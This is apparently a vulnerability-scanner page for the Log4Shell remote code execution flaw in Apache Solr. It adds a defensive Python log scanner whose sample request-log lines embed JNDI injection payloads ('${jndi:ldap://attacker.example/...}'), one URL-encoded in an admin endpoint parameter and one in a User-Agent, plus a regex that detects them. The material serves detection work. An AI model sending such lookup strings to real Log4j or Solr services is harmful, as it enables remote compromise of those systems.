Apache Solr Remote Code Execution Scanner
Detects the Remote Code Execution (RCE) vulnerability in Apache Solr that affects version 7 and later.
Short Info
- Level: Critical
- Single Scan
- Can be used by: Asset Owner
- Estimated Time: 1 minute
- Time Interval: 19 days
- Scan only one: Domain, IPv4, Subdomain
- Toolbox: -
Apache Solr is an open-source enterprise search platform used for building search applications. It is primarily used by developers and organizations aiming to enable advanced search and indexing features within their applications. Solr is designed to be highly reliable, scalable, and fault-tolerant. With REST-like HTTP/XML and JSON APIs, it is particularly suited for use cases requiring full-text search capabilities. The platform can be deployed on premises or in cloud environments, making it versatile for integrating into various infrastructures. Organizations across different industries utilize Solr for powering search and navigation in their websites and applications.
Remote Code Execution (RCE) is a severe vulnerability that allows attackers to execute arbitrary code on a remote system. When exploited, this vulnerability could enable an attacker to perform any action that the application itself can perform. RCE vulnerabilities are critical because they compromise the integrity, confidentiality, and availability of the application and its data. Such vulnerabilities often arise from improper handling of user input, where malicious inputs are executed as part of the application's code. Detection and remediation of RCE vulnerabilities are crucial to maintaining application security.
The vulnerability stems from the JNDI lookup feature in Apache Log4j versions up to and including 2.14.1. These lookups are not properly restricted, so an attacker who controls logged input can make Log4j contact LDAP and other JNDI endpoints that the attacker operates. In Apache Solr, a specific endpoint in the admin interface is affected, so a crafted request can trigger the lookup and lead to remote code execution. The root issue is the unsafe handling of configuration values, log messages, and request parameters in which JNDI URLs appear. Patching Log4j and securing these endpoints is essential to prevent exploitation.
Exploiting this vulnerability can lead to complete application takeover, resulting in unauthorized data access, data loss, or system downtime. Attackers could install backdoors, exfiltrate sensitive information, or deploy ransomware. The failure to address this vulnerability could have significant financial and reputational impacts on affected organizations. Furthermore, a compromised system might be used as a pivot point for attacking other networked systems, compounding the risk.
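As an added defender-side illustration (not part of this scanner or of the referenced projects), the following Python scans Solr's Jetty-style request log for the `${jndi:` lookup string that this vulnerability relies on, including URL-encoded forms that a plain text search would miss. The log format, hostnames and log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Log4j lookup syntax is ${prefix:...}; the jndi prefix is the one abused by CVE-2021-44228.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Jetty/Solr request-log shape (assumed):
# client - - [timestamp] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

def normalize(value, rounds=3):
    """Strip up to `rounds` layers of URL encoding so %24%7Bjndi%3A reads as ${jndi:."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (field, client, timestamp) for every logged field carrying a JNDI lookup."""
    m = LINE_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ("path", "referer", "ua"):
        value = m.group(field)
        if value and JNDI_RE.search(normalize(value)):
            hits.append((field, m.group("client"), m.group("ts")))
    return hits

def scan_log(lines):
    """Scan a whole log; one finding per tainted field, in log order."""
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample lines (placeholder hosts); the second hides the lookup behind URL encoding.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Dec/2021:12:00:03 +0000] "GET /solr/ HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/x}"',
]

if __name__ == "__main__":
    for field, client, ts in scan_log(SAMPLE_LOG):
        print(f"{ts} {client}: JNDI lookup string in request {field}")
```

Feed real Jetty request logs to `scan_log` line by line; a hit is a reason to check whether the Log4j version on that Solr instance is still at or below 2.14.1.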
REFERENCES
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228